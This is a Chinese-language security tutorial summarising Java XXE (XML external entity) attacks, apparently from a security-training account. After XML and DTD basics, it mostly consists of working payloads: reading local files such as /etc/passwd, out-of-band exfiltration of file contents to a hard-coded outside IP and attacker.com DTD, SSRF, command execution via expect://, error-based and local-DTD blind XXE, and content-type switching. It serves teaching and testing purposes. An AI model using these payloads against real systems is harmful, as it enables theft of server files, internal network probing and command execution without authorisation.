扫码领资料
获网安教程
本文由掌控安全学院 - yusi 投稿
来Track安全社区投稿~
千元稿费!还有保底奖励~(https://bbs.zkaq.cn)
JAVA XXE 学习总结
XML 基础
XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。
<!--XML申明--><?xml version="1.0"?><!--文档类型定义--><!DOCTYPE note [ <!--定义此文档是 note 类型的文档--><!ELEMENT note (to,from,heading,body)> <!--定义note元素有四个元素--><!ELEMENT to (#PCDATA)> <!--定义to元素为”#PCDATA”类型--><!ELEMENT from (#PCDATA)> <!--定义from元素为”#PCDATA”类型--><!ELEMENT head (#PCDATA)> <!--定义head元素为”#PCDATA”类型--><!ELEMENT body (#PCDATA)> <!--定义body元素为”#PCDATA”类型-->]><!--文档元素--><note><to>Dave</to><from>Tom</from><head>Reminder</head><body>You are a good man</body></note>
xxe漏洞只与DTD文档类型定义有关,下面开始只需要关注DTD即可。
DTD
DTD 用于定义 XML 文档格式的一种规范,它声明了 XML 文档中允许的元素、属性、层级结构,确保 XML 文档格式正确性。
DTD 又分为外部 DTD 和内部 DTD,
<?xml version="1.0"?><!DOCTYPE note [<!ELEMENT note (to, from, heading, body)><!ELEMENT to (#PCDATA)><!ELEMENT from (#PCDATA)><!ELEMENT heading (#PCDATA)><!ELEMENT body (#PCDATA)>]><note><to>John</to><from>Jane</from><heading>Reminder</heading><body>Don't forget our meeting at 3 PM!</body></note>
<!ELEMENT note (to, from, heading, body)><!ELEMENT to (#PCDATA)><!ELEMENT from (#PCDATA)><!ELEMENT heading (#PCDATA)><!ELEMENT body (#PCDATA)>
<?xml version="1.0"?><!DOCTYPE note SYSTEM "note.dtd"><note><to>John</to><from>Jane</from><heading>Reminder</heading><body>Don't forget our meeting at 3 PM!</body></note>
<!DOCTYPE name SYSTEM "address.dtd" [...]>
<!DOCTYPE name PUBLIC "any text" "http://evil.com/evil.dtd">
XXE 原理介绍
<!ENTITY name SYSTEM "URI/URL">
% 或 & 进行引用,正是因为这些条件才使得我们能够进行实体注入。XXE 攻击
任意文件读取
package org.example;import javax.xml.parsers.DocumentBuilder;import javax.xml.parsers.DocumentBuilderFactory;import org.w3c.dom.Document;public class DOMXML {public static void main(String[] args) {try {DocumentBuilderFactory documentBuilderFactory = DocumentBuilderFactory.newInstance();DocumentBuilder documentBuilder = documentBuilderFactory.newDocumentBuilder();Document document = documentBuilder.parse("D:\\JavaLearn\\test\\src\\main\\java\\test.xml");String textContent = document.getDocumentElement().getTextContent();System.out.println(textContent);} catch (Exception e) {e.printStackTrace();}}}
<?xml version="1.0" encoding="UTF-8" ?><!DOCTYPE file [<!ENTITY xxe SYSTEM "file://D:/JavaLearn/test/src/main/java/flag.txt">]><root>&xxe;</root>
<?xml version="1.0" encoding="UTF-8" ?><!DOCTYPE file [<!ENTITY xxe SYSTEM "file://D:/JavaLearn/test/src/main/java/">]><root>&xxe;</root>
OOB XXE
package org.example;import javax.xml.parsers.DocumentBuilder;import javax.xml.parsers.DocumentBuilderFactory;import org.w3c.dom.Document;public class DOMXML {public static void main(String[] args) {try {DocumentBuilderFactory documentBuilderFactory = DocumentBuilderFactory.newInstance();DocumentBuilder documentBuilder = documentBuilderFactory.newDocumentBuilder();Document document = documentBuilder.parse("D:\\JavaLearn\\test\\src\\main\\java\\test.xml");String textContent = document.getDocumentElement().getTextContent();System.out.println(textContent);} catch (Exception e) {e.printStackTrace();}}}
<!ENTITY % file SYSTEM "./flag.txt"><!ENTITY % define_http "<!ENTITY % send_http SYSTEM 'http://106.53.212.184:6666/%file;'>">
<?xml version="1.0" encoding="utf-8" ?><!DOCTYPE xdsec[<!ENTITY % include SYSTEM "./test.dtd" >%include;%define_http;%send_http;]><books></books>
%file 内容,% 就是%的实体编码,防止冲突报错,而且只有外部 dtd 文件才允许实体里面套实体<!ENTITY % define_http "<!ENTITY % send_http SYSTEM 'http://106.53.212.184:6666/%file;'>">
<!ENTITY % define_http "<!ENTITY send_http SYSTEM 'http://106.53.212.184:6666/%file;'>">%define_http;然后利用&send_http;去引用
SSRF
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE xxe [<!ENTITY url SYSTEM "http://192.168.116.1:90/" >]><xxe>&url;</xxe>
RCE
expect:// 是一些配置不当导致的命令执行协议,如果目标内部的PHP环境中安装了expect扩展,并且该扩展被加载到了处理XML的内部应用程序上,就可以利用expect来执行系统命令。<?xml version="1.0" encoding="utf-8" ?><!DOCTYPE xxe [<!ENTITY url SYSTEM "expect://whoami" >]><xxe>&url;</xxe>
基于报错回显
<?xml version="1.0" ?><!DOCTYPE message [<!ENTITY % ext SYSTEM "http://attacker.com/test.dtd">%ext;]><message></message>
<!ENTITY % file SYSTEM "./flag.txt"><!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///abcxyz/%file;'>">%eval;%error;
利用本地 DTD 来利用盲目 XXE
%file 的内容。<!ENTITY % condition "and | or | not | equal | contains | exists | subdomain-of"><!ELEMENT pattern (%condition;)>
<?xml version="1.0" ?><!DOCTYPE message [<!ENTITY % local_dtd SYSTEM "file://test.dtd"><!ENTITY % condition 'aaa)><!ENTITY % file SYSTEM "file:///etc/passwd"><!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///nonexistent/%file;'>">%eval;%error;<!ELEMENT aa (bb'>%local_dtd;]><message>any text</message>
condition 参数的值会进行覆盖'aaa)><!ENTITY % file SYSTEM "file:///etc/passwd"><!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///nonexistent/%file;'>">%eval;%error;<!ELEMENT aa (bb'
<!ENTITY % condition "aaa)><!ENTITY % file SYSTEM "file:///etc/passwd"><!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///nonexistent/%file;'>">%eval;%error;<!ELEMENT aa (bb"><!ELEMENT pattern (aaa)><!ENTITY % file SYSTEM "file:///etc/passwd"><!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///nonexistent/%file;'>">%eval;%error;<!ELEMENT aa (bb)>
通过修改内容类型进行 XXE 攻击
POST /action HTTP/1.0Content-Type: application/x-www-form-urlencodedContent-Length: 7foo=bar
POST /action HTTP/1.0Content-Type: application/xmlContent-Length: 52<?xml version="1.0" encoding="UTF-8"?><foo>bar</foo>
POST /action HTTP/1.1Content-Type: application/xmlContent-Length: 288<?xml version="1.0" encoding="UTF-8" ?><!DOCTYPE netspi [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><root></root><search>name</search><value>&xxe;</value></root>
Excel文件导致XXE
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE xxe [<!ENTITY url SYSTEM "http://DNSLOG/" >]><xxe>&url;</xxe>
申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,
所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.
没看够~?欢迎关注!
分享本文到朋友圈,可以凭截图找老师领取
上千教程+工具+靶场账号哦
分享后扫码加我!
回顾往期内容
代理池工具撰写 | 只有无尽的跳转,没有封禁的IP!
点赞+在看支持一下吧~感谢看官老爷~
你的点赞是我更新的动力
